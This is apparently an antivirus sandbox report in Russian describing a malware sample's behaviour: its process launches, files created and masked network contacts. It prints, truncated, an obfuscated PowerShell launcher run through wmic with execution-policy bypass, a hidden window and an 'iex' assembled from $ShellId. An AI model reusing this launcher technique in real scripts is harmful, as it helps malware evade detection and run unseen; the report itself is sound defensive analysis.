Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 980
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1062296.cvr
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Сетевая активность
TCP
- 'nr###dorc.com':443
UDP
- DNS ASK ro###orc.com
- DNS ASK nr###dorc.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...' (со скрытым окном)
